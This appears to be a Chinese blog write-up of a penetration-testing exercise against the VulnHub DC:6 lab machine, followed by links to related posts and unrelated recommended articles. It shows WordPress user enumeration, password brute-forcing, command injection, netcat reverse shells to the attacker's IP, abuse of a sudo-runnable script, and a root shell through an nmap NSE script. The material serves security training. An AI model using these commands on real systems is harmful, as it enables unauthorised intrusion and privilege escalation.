vulnhub-DC:6靶机渗透记录
准备工作
在vulnhub官网下载DC:6靶机DC: 6 ~ VulnHub
导入到vmware,设置成NAT模式

打开kali准备进行渗透(ip:192.168.200.6)
信息收集
利用nmap进行ip端口探测
nmap -sS 192.168.200.6/24

探测到ip为192.168.200.17的靶机,开放了80端口和22端口
再用nmap对所有端口进行探测,确保没有别的遗漏信息
nmap -sV -p- 192.168.200.17

先看看80端口,一直打不开,重定向到了wordy,像DC:2的方法一样操作,修改host文件

vi /etc/hosts

和dc:2的界面一模一样框架也是 WordPress

dirsearch扫描也扫到了/wp-login.php后台登陆页面


接下来和dc:2的操作基本一致
wpscan扫描
使用kali自带的工具wpscan(wordpress框架专门的漏洞扫描工具)列举出所有用户
wpscan --url http://wordy/ -e u

爆出五个用户 admin、jens、graham、mark、sarah,保存下来待会进行爆破
但是用了很多字典都爆破不出来,不知道怎么办的时候才发现在下载地址处的最下面给了线索DC: 6 ~ VulnHub

先cd到/usr/share/wordlists/这个目录,因为rockyou这个文件没有解压不能直接打开
gunzip rockyou.txt.gz

再返回桌面执行作者给的命令
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

直接使用wordy进行爆破
wpscan --url http://wordy/ -U user -P passwords.txt

爆到用户名mark 密码helpdesk01
nc反弹shell
登陆到刚刚的后台页面,在这里找到了命令执行的地方,试了一下127.0.0.1|ls 发现有漏洞可以执行任意命令,那就可以反弹shell到kali上


使用nc反弹shell,但是那个框有字数限制,用bp抓一下再放出去就解决了
nc -e /bin/bash 192.168.200.6 9999

再使用python 通过pty.spawn()获得交互式shell
python -c'import pty;pty.spawn("/bin/bash")'

root没有权限进不去,但是在home里发现了四个用户,在mark用户发现了一个txt文件,里面有graham的密码 GSo7isUM1D4


使用su切换成graham,看看graham的权限

发现jens下的backups.sh可以不用密码执行,可以用来获取jens的权限
这里有两种方法第一种是写入/bin/bash/,然后以jens的用户来执行文件直接获取权限
这里我记录第二种方法,写入nc命令,然后在另一端监听nc -lvf 9999,最后在以jens用户执行sh文件,再使用python 通过pty.spawn()获得交互式shell,两种方法思路都差不多
echo 'nc 192.168.200.6 9999 -e /bin/bash' > backups.sh
sudo -u jens /home/jens/backups.sh
python -c'import pty;pty.spawn("/bin/bash")'

在看看jens的权限sudo -l

发现root权限namp无需密码,利用这个文件提权
权限提升
namp有执行脚本的功能,那就可以写一个执行bash的脚本文件,通过namp执行来提权
echo 'os.execute("/bin/sh")' > getroot.nse //nes脚本后缀
sudo nmap --script=/home/jens/getroot.nse //namp执行


DONE
参考文章
vulnhub-DC:6靶机渗透记录的更多相关文章
- vulnhub-DC:2靶机渗透记录
准备工作 在vulnhub官网下载DC:1靶机https://www.vulnhub.com/entry/dc-2,311/ 导入到vmware 打开kali准备进行渗透(ip:192.168.200 ...
- vulnhub-DC:5靶机渗透记录
准备工作 在vulnhub官网下载DC:5靶机DC: 5 ~ VulnHub 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:192.168.200.6) 信息收集 利用nmap ...
- vulnhub-DC:1靶机渗透记录
准备工作 在vulnhub官网下载DC:1靶机https://www.vulnhub.com/entry/dc-1,292/ 导入到vmware 打开kali准备进行渗透(ip:192.168.200 ...
- vulnhub-DC:3靶机渗透记录
准备工作 在vulnhub官网下载DC:1靶机www.vulnhub.com/entry/dc-3,312/ 导入到vmware 导入的时候遇到一个问题 解决方法: 点 "虚拟机" ...
- vulnhub-DC:4靶机渗透记录
准备工作 在vulnhub官网下载DC:4靶机https://www.vulnhub.com/entry/dc-4,313/ 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:19 ...
- vulnhub-DC:7靶机渗透记录
准备工作 在vulnhub官网下载DC:7靶机DC: 7 ~ VulnHub 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:192.168.200.6) 信息收集 已经知道了靶 ...
- vulnhub-DC:8靶机渗透记录
准备工作 在vulnhub官网下载DC:8靶机DC: 8 ~ VulnHub 导入到vmware,设置成NAT模式 打开kali准备进行渗透(ip:192.168.200.6) 信息收集 利用nmap ...
- vulnhub-XXE靶机渗透记录
准备工作 在vulnhub官网下载xxe靶机 导入虚拟机 开始进行渗透测试 信息收集 首先打开kali,设置成NAT模式 查看本机ip地址 利用端口扫描工具nmap进行探测扫描 nmap -sS 19 ...
- DC 1-3 靶机渗透
DC-1靶机 端口加内网主机探测,发现192.168.114.146这台主机,并且开放了有22,80,111以及48683这几个端口. 发现是Drupal框架. 进行目录的扫描: 发现admin被禁止 ...
随机推荐
- 乘风破浪,Java遇见OpenJDK GA(Build By Microsoft),即将晋升为Azure云管理服务默认JVM
什么是Microsoft Build of OpenJDK Java Development Kit (JDK) 是Sun公司(已被Oracle收购)针对Java开发员的软件开发工具包.自从Java推 ...
- 利用C语言输出一个二元一次函数
#include<stdio.h> #include<math.h> int main(void)//其实void我认为在这可有可无 { double a,b,c,x1,x2 ...
- C#Expression合集
一:总体概览 1:获取属性值: 2:调用方法 3:动态构造条件 4:创建对象 5:Switch Case 6:Try Catch 以及捕获异常信息并输出 7:if esle 8:+ / += 9: ...
- Docker:docker安装部署jenkins
Docker安装步骤请转到:https://www.cnblogs.com/nhdlb/p/11262527.html 查看docker的jenkins镜像版本 #查看jenkins版本命令 dock ...
- Spring:Spring项目多接口实现类报错找不到指定类
spring可以通过applicationContext.xml进行配置接口实现类 applicationContext.xml中可以添加如下配置: 在application.properties中添 ...
- js 简单实现获取短信按钮倒计时60秒
<!DOCTYPE html><html lang="en"><head> <meta http-equiv="Content- ...
- Leetcode 递归题
24. 两两交换链表中的节点 题目描述: 给定一个链表,两两交换其中相邻的节点,并返回交换后的链表. 你不能只是单纯的改变节点内部的值,而是需要实际的进行节点交换. 示例: 给定 1->2-&g ...
- asp.net mvc中的安全性
1.重复提交攻击:通过Bind特性指定要绑定和不绑定的值. 2.Cookie盗窃:阻止脚本对站点中Cookie的访问,webconfig文件中添加<HttpCookies domain=&quo ...
- C语言:宏定义
#include <stdio.h> #define PI 3.14159265454454235432453245 main() { printf("%f\n",PI ...
- Beautifulsoup网页解析——爬取豆瓣排行榜分类接口
我们在网页爬取的过程中,会通过requests成功的获取到所需要的信息,而且,在返回的网页信息中,也是通过HTML代码的形式进行展示的.HTML代码都是通过固定的标签组合来实现页面信息的展示,所以,最 ...